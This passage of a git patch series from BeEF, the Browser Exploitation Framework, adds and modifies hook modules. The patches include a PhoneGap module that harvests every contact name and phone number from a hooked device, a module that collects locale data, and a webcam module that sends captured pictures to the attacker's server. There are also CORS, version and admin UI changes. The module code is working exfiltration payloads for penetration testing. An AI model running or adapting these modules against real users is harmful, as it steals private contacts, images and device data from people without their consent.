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");
+
+});
+
diff --git a/modules/debug/test_return_image/config.yaml b/modules/debug/test_return_image/config.yaml
new file mode 100644
index 000000000..cf54bd08e
--- /dev/null
+++ b/modules/debug/test_return_image/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        test_return_image:
+            enable: true
+            category: "Debug"
+            name: "Return Image"
+            description: "This module will test returning a PNG image as a base64 encoded string. The image should be rendered in the BeEF web interface."
+            authors: ["bcoles"]
+            target:
+                working: ["ALL"]
diff --git a/modules/debug/test_return_image/module.rb b/modules/debug/test_return_image/module.rb
new file mode 100644
index 000000000..893ab7911
--- /dev/null
+++ b/modules/debug/test_return_image/module.rb
@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Test_return_image < BeEF::Core::Command
+  
+  def post_execute
+    content = {}
+    content['image'] = @datastore['image']
+    save content
+  end
+
+end

From 723395766441470f492ea79ae39e12b52d7a31f6 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Tue, 30 Apr 2013 18:56:37 +0930
Subject: [PATCH 282/397] Update version

---
 VERSION     | 2 +-
 config.yaml | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/VERSION b/VERSION
index 38a1f3dae..a0071fa6f 100644
--- a/VERSION
+++ b/VERSION
@@ -4,4 +4,4 @@
 # See the file 'doc/COPYING' for copying permission
 #
 
-0.4.4.4-alpha
+0.4.4.5-alpha
diff --git a/config.yaml b/config.yaml
index a78a872a8..3c7e2f211 100644
--- a/config.yaml
+++ b/config.yaml
@@ -6,7 +6,7 @@
 # BeEF Configuration file
 
 beef:
-    version: '0.4.4.4-alpha'
+    version: '0.4.4.5-alpha'
     debug: false
 
     restrictions:

From b82696ead2e7d68b4c48cfcc165daab2efebcafa Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Wed, 1 May 2013 16:43:26 +0930
Subject: [PATCH 283/397] Enabled web server imitation by default

The time has come. This feature has been stable for a while.
---
 config.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/config.yaml b/config.yaml
index 3c7e2f211..0cf0ff621 100644
--- a/config.yaml
+++ b/config.yaml
@@ -43,7 +43,7 @@ beef:
 
         # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
         web_server_imitation:
-            enable: false
+            enable: true
             type: "apache" #supported: apache, iis
 
         # Experimental HTTPS support for the hook / admin / all other Thin managed web services

From 91e2b36ce4cad10b02c733eedf03c051c6809791 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Wed, 1 May 2013 16:44:28 +0930
Subject: [PATCH 284/397] Update webcam module so the picture returned as a
 base64 encoded string will be rendered in the admin UI

---
 modules/browser/webcam/command.js | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/browser/webcam/command.js b/modules/browser/webcam/command.js
index a4f939a5d..bb3465385 100644
--- a/modules/browser/webcam/command.js
+++ b/modules/browser/webcam/command.js
@@ -22,7 +22,7 @@ beef.execute(function() {
     
     
     //These 4 function names [noCamera(), noCamera(), pressedDisallow(), pictureCallback(picture), allPicturesTaken()] are hard coded in the swf actionscript3. Flash will invoke these functions directly. The picture for the pictureCallback function will be a base64 encoded JPG string
-    var js_functions = '<script>function noCamera() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has no camera"); }; function pressedAllow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed allow, you should get pictures soon"); }; function pressedDisallow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed disallow, you won\'t get pictures"); }; function pictureCallback(picture) { beef.net.send("<%= @command_url %>", <%= @command_id %>, "picture="+picture); }; function allPicturesTaken(){  }';
+    var js_functions = '<script>function noCamera() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has no camera"); }; function pressedAllow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed allow, you should get pictures soon"); }; function pressedDisallow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed disallow, you won\'t get pictures"); }; function pictureCallback(picture) { beef.net.send("<%= @command_url %>", <%= @command_id %>, "image="+picture); }; function allPicturesTaken(){  }';
     
     //This function is called by swfobject, if if fails to add the flash file to the page
     

From 15c7e64e93329d27eb3a1964c922e2bc19eb9920 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Wed, 1 May 2013 17:47:00 +0930
Subject: [PATCH 285/397] Fix bug with module image result rendering in admin
 UI

---
 .../media/javascript/ui/panel/common.js       | 24 ++++++++++++-------
 1 file changed, 15 insertions(+), 9 deletions(-)

diff --git a/extensions/admin_ui/media/javascript/ui/panel/common.js b/extensions/admin_ui/media/javascript/ui/panel/common.js
index 1727e17b8..594237c78 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/common.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/common.js
@@ -249,18 +249,24 @@ function genExistingExploitPanel(panel, command_id, zombie, sb) {
 							html = String.format("<div style='color:#385F95;text-align:right;'>{0}</div>", value);
 							html += '<p>';
 							for(index in record.data.data) {
-								result = record.data.data[index];
+								result = $jEncoder.encoder.encodeForHTML(record.data.data[index]).replace(/&lt;br&gt;/g,'<br>');
 								index = index.toString().replace('_', ' ');
-								//Check if the data is the image parameter and that it's a base64 encoded png.
-                                if ($jEncoder.encoder.encodeForHTML(result).replace(/&lt;br&gt;/g,'<br>').substring(0,28) == "image=data:image/png;base64,") {
-                                	//Lets display the image. // Does this introduce issues? Or, does the encoding keep this sound?
-                                	html += String.format('<img src="{0}" /><br>', $jEncoder.encoder.encodeForHTML(result).replace(/&lt;br&gt;/g,'<br>').substring(6));
-                                } else {
-	                                //output escape everything, but allow the <br> tag for better rendering.
-									html += String.format('<b>{0}</b>: {1}<br>', index, $jEncoder.encoder.encodeForHTML(result).replace(/&lt;br&gt;/g,'<br>'));
+								// Check if the data is the image parameter and that it's a base64 encoded png.
+								if (result.substring(0,28) == "image=data:image/png;base64,") {
+									// Lets display the image
+									try {
+										base64_data = window.atob(result.substring(29,result.length));
+										html += String.format('<img src="{0}" /><br>', result.substring(6));
+									} catch(e) {
+										beef.debug("Received invalid base64 encoded image string: "+e.toString());
+										html += String.format('<b>{0}</b>: {1}<br>', index, result);
+									}
+								} else {
+									// output escape everything, but allow the <br> tag for better rendering.
+									html += String.format('<b>{0}</b>: {1}<br>', index, result);
 								}
 							}
-							
+
 							html += '</p>';
 							return html;
 						}

From 6da4e2c39ccbb07783f1e96015c7958457145661 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Wed, 1 May 2013 17:49:21 +0930
Subject: [PATCH 286/397] Update version to '0.4.4.4.1-alpha' bug fix edition

---
 VERSION     | 2 +-
 config.yaml | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/VERSION b/VERSION
index a0071fa6f..ff6420cd8 100644
--- a/VERSION
+++ b/VERSION
@@ -4,4 +4,4 @@
 # See the file 'doc/COPYING' for copying permission
 #
 
-0.4.4.5-alpha
+0.4.4.4.1-alpha
diff --git a/config.yaml b/config.yaml
index 0cf0ff621..c4e551640 100644
--- a/config.yaml
+++ b/config.yaml
@@ -6,7 +6,7 @@
 # BeEF Configuration file
 
 beef:
-    version: '0.4.4.5-alpha'
+    version: '0.4.4.4.1-alpha'
     debug: false
 
     restrictions:

From 09be2db069c0bdf373805db19ecddb3bb7412ae9 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Wed, 1 May 2013 17:53:21 +0930
Subject: [PATCH 287/397] Update version to beef-0.4.4.5

---
 VERSION     | 2 +-
 config.yaml | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/VERSION b/VERSION
index ff6420cd8..a0071fa6f 100644
--- a/VERSION
+++ b/VERSION
@@ -4,4 +4,4 @@
 # See the file 'doc/COPYING' for copying permission
 #
 
-0.4.4.4.1-alpha
+0.4.4.5-alpha
diff --git a/config.yaml b/config.yaml
index c4e551640..0cf0ff621 100644
--- a/config.yaml
+++ b/config.yaml
@@ -6,7 +6,7 @@
 # BeEF Configuration file
 
 beef:
-    version: '0.4.4.4.1-alpha'
+    version: '0.4.4.5-alpha'
     debug: false
 
     restrictions:

From ef2eac26ebac90e7f1fcdf1aa1970a8b7d93c9c7 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Wed, 1 May 2013 11:15:21 +0100
Subject: [PATCH 288/397] Issue #886: Added support for CORS on the Router
 object. The RESTful aPI can not be called from JS x-domain.

---
 config.yaml                |  6 ++++++
 core/main/router/router.rb | 11 +++++++++--
 2 files changed, 15 insertions(+), 2 deletions(-)

diff --git a/config.yaml b/config.yaml
index 0cf0ff621..4e6440c09 100644
--- a/config.yaml
+++ b/config.yaml
@@ -33,6 +33,12 @@ beef:
         hook_session_name: "BEEFHOOK"
         session_cookie_name: "BEEFSESSION"
 
+        # Allow one or multiple domains to access the RESTful API using CORS
+        # For multiple domains use: "http://browserhacker.com, http://domain2.com"
+        restful_api:
+            allow_cors: false
+            cors_allowed_domains: "http://browserhacker.com"
+
         # Prefer WebSockets over XHR-polling when possible.
         websocket:
           enable: false
diff --git a/core/main/router/router.rb b/core/main/router/router.rb
index 10e5d452c..4c155680d 100644
--- a/core/main/router/router.rb
+++ b/core/main/router/router.rb
@@ -81,16 +81,23 @@ module BeEF
             case type
               when "apache"
                 headers "Server" => "Apache/2.2.3 (CentOS)",
-                        "Content-Type" => "text/html"
+                        "Content-Type" => "text/html; charset=UTF-8"
 
               when "iis"
                 headers "Server" => "Microsoft-IIS/6.0",
                         "X-Powered-By" => "ASP.NET",
-                        "Content-Type" => "text/html"
+                        "Content-Type" => "text/html; charset=UTF-8"
               else
                 print_error "You have and error in beef.http.web_server_imitation.type! Supported values are: apache, iis."
             end
           end
+
+          # @note If CORS are enabled, expose the appropriate headers
+          if config.get("beef.http.restful_api.allow_cors")
+            allowed_domains = config.get("beef.http.restful_api.cors_allowed_domains")
+            headers "Access-Control-Allow-Origin" => allowed_domains,
+                    "Access-Control-Allow-Methods" => "POST, GET"
+          end
         end
 
         # @note Default root page

From 9915547b19cf1855e824f4c37b31b68e19927ac2 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Wed, 1 May 2013 17:19:48 +0100
Subject: [PATCH 289/397] Issue #886: Added support for preflight OPTIONS
 request.

---
 core/main/router/router.rb | 9 +++++++++
 1 file changed, 9 insertions(+)

diff --git a/core/main/router/router.rb b/core/main/router/router.rb
index 4c155680d..39ae98d13 100644
--- a/core/main/router/router.rb
+++ b/core/main/router/router.rb
@@ -92,6 +92,15 @@ module BeEF
             end
           end
 
+          # @note If CORS are enabled, expose the appropriate headers
+          # this apparently duplicate code is needed to reply to preflight OPTIONS requests, which need to respond with a 200
+          if request.request_method == 'OPTIONS' && config.get("beef.http.restful_api.allow_cors")
+            allowed_domains = config.get("beef.http.restful_api.cors_allowed_domains")
+            headers "Access-Control-Allow-Origin" => allowed_domains,
+                    "Access-Control-Allow-Methods" => "POST, GET"
+            halt 200
+          end
+
           # @note If CORS are enabled, expose the appropriate headers
           if config.get("beef.http.restful_api.allow_cors")
             allowed_domains = config.get("beef.http.restful_api.cors_allowed_domains")

From c5d5b99472ef0e0c74641d4e9bc13e9ca8d39a84 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Thu, 2 May 2013 10:55:16 +0100
Subject: [PATCH 290/397] Issue #886: The preflight OPTIONS request now allow
 also the content-type header, required to use a json conten-type with POST
 requests.

---
 core/main/router/router.rb | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/core/main/router/router.rb b/core/main/router/router.rb
index 39ae98d13..c6ca5c6e5 100644
--- a/core/main/router/router.rb
+++ b/core/main/router/router.rb
@@ -94,10 +94,12 @@ module BeEF
 
           # @note If CORS are enabled, expose the appropriate headers
           # this apparently duplicate code is needed to reply to preflight OPTIONS requests, which need to respond with a 200
+          # and be able to handle requests with a JSON content-type
           if request.request_method == 'OPTIONS' && config.get("beef.http.restful_api.allow_cors")
             allowed_domains = config.get("beef.http.restful_api.cors_allowed_domains")
             headers "Access-Control-Allow-Origin" => allowed_domains,
-                    "Access-Control-Allow-Methods" => "POST, GET"
+                    "Access-Control-Allow-Methods" => "POST, GET",
+                    "Access-Control-Allow-Headers" => "Content-Type"
             halt 200
           end
 

From 1699d52475c5118286f2623bf24ec620e09fae2e Mon Sep 17 00:00:00 2001
From: Sergey Gorbaty <gorbaty.sergey@gmail.com>
Date: Fri, 3 May 2013 10:09:09 -0700
Subject: [PATCH 291/397] adding contact list

---
 .../phonegap_list_contacts/command.js         | 39 +++++++++++++++++++
 .../phonegap_list_contacts/config.yaml        | 17 ++++++++
 .../phonegap/phonegap_list_contacts/module.rb | 15 +++++++
 3 files changed, 71 insertions(+)
 create mode 100644 modules/phonegap/phonegap_list_contacts/command.js
 create mode 100644 modules/phonegap/phonegap_list_contacts/config.yaml
 create mode 100644 modules/phonegap/phonegap_list_contacts/module.rb

diff --git a/modules/phonegap/phonegap_list_contacts/command.js b/modules/phonegap/phonegap_list_contacts/command.js
new file mode 100644
index 000000000..533def2e4
--- /dev/null
+++ b/modules/phonegap/phonegap_list_contacts/command.js
@@ -0,0 +1,39 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+// phonegap_list_contacts
+//
+beef.execute(function() {
+    var result = '';
+
+    function onSuccess(contacts) {
+
+         for (var i=0; i<contacts.length; i++) {
+            result = result + '\n' + contacts[i].displayName;
+            
+            for (var j=0; j<contacts[i].phoneNumbers.length; j++) {
+                result = result + ' #' + contacts[i].phoneNumbers[j].value;
+            }
+        }
+
+        beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );    
+
+    };
+
+    function onError(contactError) {
+        result = 'fail';
+        beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); 
+    };
+
+
+    var options = new ContactFindOptions();
+    options.filter="";
+    options.multiple=true; 
+    var fields = ["displayName", "phoneNumbers"];
+    
+    navigator.contacts.find(fields, onSuccess, onError, options);
+    
+});
\ No newline at end of file
diff --git a/modules/phonegap/phonegap_list_contacts/config.yaml b/modules/phonegap/phonegap_list_contacts/config.yaml
new file mode 100644
index 000000000..7b4e28cff
--- /dev/null
+++ b/modules/phonegap/phonegap_list_contacts/config.yaml
@@ -0,0 +1,17 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+#   phonegap
+#
+beef:
+    module:
+        phonegap_list_contacts:
+            enable: true
+            category: "Phonegap"
+            name: "List Contacts"
+            description: "Examine device contacts."
+            authors: ["staregate"]
+            target:
+                working: ["All"]
diff --git a/modules/phonegap/phonegap_list_contacts/module.rb b/modules/phonegap/phonegap_list_contacts/module.rb
new file mode 100644
index 000000000..e892b491a
--- /dev/null
+++ b/modules/phonegap/phonegap_list_contacts/module.rb
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+# // phonegap_list_contacts
+
+class Phonegap_list_contacts < BeEF::Core::Command
+
+  def post_execute
+    content = {}
+    content['Result'] = @datastore['result']
+    save content
+  end 
+end

From b79402ce5f0c741fdd211cc3ee355fd7e5922ce5 Mon Sep 17 00:00:00 2001
From: Xiaoran Wang <xiaoran.wang@xiaoranwang-wsl.internal.salesforce.com>
Date: Fri, 3 May 2013 11:02:11 -0700
Subject: [PATCH 292/397] updated sinatra from 1.3.2 to 1.4.2 to fix the CORS
 request always return a 403 bug. link here
 https://github.com/sinatra/sinatra/issues/518

---
 Gemfile | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/Gemfile b/Gemfile
index 96fc0dfc8..b1ecd1fd6 100644
--- a/Gemfile
+++ b/Gemfile
@@ -13,7 +13,7 @@ end
 
 gem "eventmachine", "1.0.3"
 gem "thin"
-gem "sinatra", "1.3.2"
+gem "sinatra", "1.4.2"
 gem "em-websocket", "~> 0.3.6"
 gem "jsmin", "~> 1.0.1"
 gem "ansi"

From ea560c346454c3898387a7752076930439c32eb1 Mon Sep 17 00:00:00 2001
From: Xiaoran Wang <frankxrwang@gmail.com>
Date: Fri, 3 May 2013 13:01:37 -0700
Subject: [PATCH 293/397] Added configurable port for postsql and mysql

---
 beef        | 1 +
 config.yaml | 1 +
 2 files changed, 2 insertions(+)

diff --git a/beef b/beef
index c8d8db1fe..7ea4d70c8 100755
--- a/beef
+++ b/beef
@@ -75,6 +75,7 @@ case config.get("beef.database.driver")
     DataMapper.setup(:default,
                      :adapter => config.get("beef.database.driver"),
                      :host => config.get("beef.database.db_host"),
+                     :port => config.get("beef.database.db_port"),
                      :username => config.get("beef.database.db_user"),
                      :password => config.get("beef.database.db_passwd"),
                      :database => config.get("beef.database.db_name"),
diff --git a/config.yaml b/config.yaml
index 4e6440c09..7e1a7c3d1 100644
--- a/config.yaml
+++ b/config.yaml
@@ -78,6 +78,7 @@ beef:
 
         # db connection information is only used for mysql/postgres
         db_host: "localhost"
+        db_port: 5432
         db_name: "beef"
         db_user: "beef"
         db_passwd: "beef123"

From 906ca6cccefc9f8f596ad4fa0c6b249cb037a080 Mon Sep 17 00:00:00 2001
From: Sergey Gorbaty <gorbaty.sergey@gmail.com>
Date: Fri, 3 May 2013 13:13:24 -0700
Subject: [PATCH 294/397] Cordova detection added

---
 core/main/client/browser.js | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index a63859b3b..a82d3df43 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -1082,8 +1082,9 @@ beef.browser = {
      */
     hasPhonegap:function () {
         var result = false;
+        
         try {
-            if (!!device.phonegap) result = true; else result = false;
+            if (!!device.phonegap || !!device.cordova) result = true; else result = false;
         }
         catch (e) {
             result = false;

From d3262d945103d21a3d41db12bc7091fc59506cb7 Mon Sep 17 00:00:00 2001
From: Sergey Gorbaty <gorbaty.sergey@gmail.com>
Date: Fri, 3 May 2013 13:34:09 -0700
Subject: [PATCH 295/397] Adding local detection

---
 .../phonegap_globalization_status/command.js  | 34 +++++++++++++++++++
 .../phonegap_globalization_status/config.yaml | 17 ++++++++++
 .../phonegap_globalization_status/module.rb   | 15 ++++++++
 3 files changed, 66 insertions(+)
 create mode 100644 modules/phonegap/phonegap_globalization_status/command.js
 create mode 100644 modules/phonegap/phonegap_globalization_status/config.yaml
 create mode 100644 modules/phonegap/phonegap_globalization_status/module.rb

diff --git a/modules/phonegap/phonegap_globalization_status/command.js b/modules/phonegap/phonegap_globalization_status/command.js
new file mode 100644
index 000000000..e5f657b9b
--- /dev/null
+++ b/modules/phonegap/phonegap_globalization_status/command.js
@@ -0,0 +1,34 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+// Phonegap_globalization_status
+//
+beef.execute(function() {
+    var result = '';
+
+    navigator.globalization.getPreferredLanguage(
+  		function (language) {
+  			result = 'language: ' + language.value + '\n';
+        beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );
+  		}, 
+  		function () {
+  			result = 'language: ' + 'fail\n';
+        beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );
+  		}
+	);
+
+    navigator.globalization.getLocaleName(
+  		function (locale) {
+  			result = 'locale: ' + locale.value + '\n';
+        beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );
+  		},
+  		function () {
+  			result = 'locale: ' + 'fail\n';
+        beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );
+  		}
+	);
+    
+});
\ No newline at end of file
diff --git a/modules/phonegap/phonegap_globalization_status/config.yaml b/modules/phonegap/phonegap_globalization_status/config.yaml
new file mode 100644
index 000000000..7ced9d85a
--- /dev/null
+++ b/modules/phonegap/phonegap_globalization_status/config.yaml
@@ -0,0 +1,17 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+#   Phonegap_globalization_status
+#
+beef:
+    module:
